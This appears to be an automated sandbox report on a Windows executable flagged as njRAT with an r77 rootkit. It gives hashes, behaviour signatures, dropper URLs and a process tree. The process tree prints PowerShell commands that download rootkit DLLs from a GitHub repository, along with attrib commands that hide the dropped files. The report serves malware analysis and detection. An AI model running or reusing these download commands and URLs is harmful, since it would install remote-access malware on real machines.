Overview

overview

10

Static

static

10

6f2bf69913...11.exe

windows7-x64

10

6f2bf69913...11.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-01-2024 08:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6f2bf69913f6bf47a6ae722c9640a311.exe

  • Size

    46KB

  • MD5

    6f2bf69913f6bf47a6ae722c9640a311

  • SHA1

    5aa0c1acc2c56f283a9694f4953f6085f0b0059d

  • SHA256

    8920797352a55d0413ab4642e7e2dcd049d702678f6870f6f58ac64e814e5720

  • SHA512

    0721b0c5ad0ce0049609da9f59359fb5d895005342f87697683c9ffbb63213b125c8c81f55dfef50b7678b0f52ad3707d8c4cbdfadb64b8136f236bb3a30164c

  • SSDEEP

    768:MB9QFE9xTu53yAeC1lNhTTHxAlbL0gUqrvs9kIL4:MBN9A5CAeCRpTHMbL0gU6+ka4

Score
10/10
njratr77rootkittrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/NGROKC/CTC/raw/main/CTC64.dll

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/NGROKC/CTC/raw/main/CTC86.dll

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • r77

    r77 is an open-source, userland rootkit.

    rootkitr77
  • r77 rootkit payload 2 IoCs

    Detects the payload of the r77 rootkit.

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • Views/modifies file attributes 1 TTPs 5 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\6f2bf69913f6bf47a6ae722c9640a311.exe
    "C:\Users\Admin\AppData\Local\Temp\6f2bf69913f6bf47a6ae722c9640a311.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4352
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D64.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4040
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','C:\Users\Admin\AppData\Local\Temp\r77-x64.dll');
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2308
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D86.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1284
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC86.dll','C:\Users\Admin\AppData\Local\Temp\r77-x86.dll');
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3936
    • C:\Windows\SYSTEM32\attrib.exe
      attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Subdir"
      2⤵
      • Views/modifies file attributes
      PID:2304
    • C:\Windows\SYSTEM32\attrib.exe
      attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Subdir\$77-google.exe"
      2⤵
      • Views/modifies file attributes
      PID:4948
    • C:\Windows\SYSTEM32\attrib.exe
      attrib +h +r +s "C:\Users\Admin\AppData\Local\"
      2⤵
      • Views/modifies file attributes
      PID:4752
    • C:\Windows\SYSTEM32\attrib.exe
      attrib +h +r +s "C:\Users\Admin\AppData\Local\Temp\cjc3LXg4Ni5kbGw="
      2⤵
      • Views/modifies file attributes
      PID:3588
    • C:\Windows\SYSTEM32\attrib.exe
      attrib +h +r +s "C:\Users\Admin\AppData\Local\Temp\r77-x64.dll"
      2⤵
      • Views/modifies file attributes
      PID:1360

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    a5c074e56305e761d7cbc42993300e1c

    SHA1

    39b2e23ba5c56b4f332b3607df056d8df23555bf

    SHA256

    e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953

    SHA512

    c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\D64.bat
    Filesize

    222B

    MD5

    9c2599eecfb45356c99a7320805d85e7

    SHA1

    ebbe61d1cf2d55c3d7c59fbaa1a2ba62b0f244e7

    SHA256

    a3f1a82cc9957b71b5409c6280e97e8af14bdc3c6fb5ad195708f8c95a6f4d40

    SHA512

    b8d32363da98d418f9caf853b1569a0b4051e2475067988f3cdbaf2226ba667d4dd1e69217e10860cb6a947b894093878a1fad6525aebb9c353e9e956a86c8a4

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\D86.bat
    Filesize

    222B

    MD5

    d35427fb987daec1ccf0b500929c0bd0

    SHA1

    f56c9b7e7ce037aa9cb3a513cb2d7ad317ab6447

    SHA256

    f818bbd6afa5d80f4b2d8c2d090a2a487d3cd69ffd32214a169d62282b7cb861

    SHA512

    73b489ab1372bc5cbf2248cf706041e73532daeebcf448d1720b485e7a5e7614afc9ebd6ea407adf3bd7006a61cef008241385bb1e060b3e4d33f8ca4b89f830

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vd5xebea.5jf.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\r77-x64.dll
    Filesize

    147KB

    MD5

    1b8bd653321cf3cbc786e563555fbc75

    SHA1

    5638efe0476c8c1b74c6604db419be814d1d90a0

    SHA256

    919a332e85d7c32a6f0a1bdd15b211b8b273b73fe05a553ea0f230a0958586c7

    SHA512

    bafdbc8413828c5427983fa0e9403a2d9a88d0ad2f27f92842310852d273f2d2c9a0c6f9f64e1aac03fadf49f9a3bcf58c6b7c8b06debcce46536114cde0175b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\r77-x86.dll
    Filesize

    114KB

    MD5

    4a35aaf2d4ab47f5ea6f75d2de75c831

    SHA1

    007676d2097defe7f793f9fb1ffe2f48c0c94ac0

    SHA256

    173f74176d13c235d744f9e32d658f6301a6b1aa81a014060ba763b55e516fe3

    SHA512

    b933b208b761260217462c5b27a6e00583c564d2def2f80fca140a2fe054cbd61bae483b9bb282fab0f23eda3f775bcc76a204f16884150b7f100f9c0bb5fc93

    Download Submit

  • memory/2308-16-0x00007FFBDFB50000-0x00007FFBE0611000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2308-22-0x00007FFBDFB50000-0x00007FFBE0611000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2308-17-0x000002A57CA20000-0x000002A57CA30000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2308-18-0x000002A57CA20000-0x000002A57CA30000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2308-15-0x000002A57C990000-0x000002A57C9B2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3936-39-0x000001FA48270000-0x000001FA48280000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3936-38-0x00007FFBDFB50000-0x00007FFBE0611000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3936-42-0x00007FFBDFB50000-0x00007FFBE0611000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4352-0-0x0000000000770000-0x0000000000782000-memory.dmp

    Filesize

    72KB

    Download

  • memory/4352-2-0x00007FFBDFB50000-0x00007FFBE0611000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4352-45-0x000000001BC90000-0x000000001BCA0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4352-46-0x00007FFBDFB50000-0x00007FFBE0611000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4352-47-0x000000001BC90000-0x000000001BCA0000-memory.dmp

    Filesize

    64KB

    Download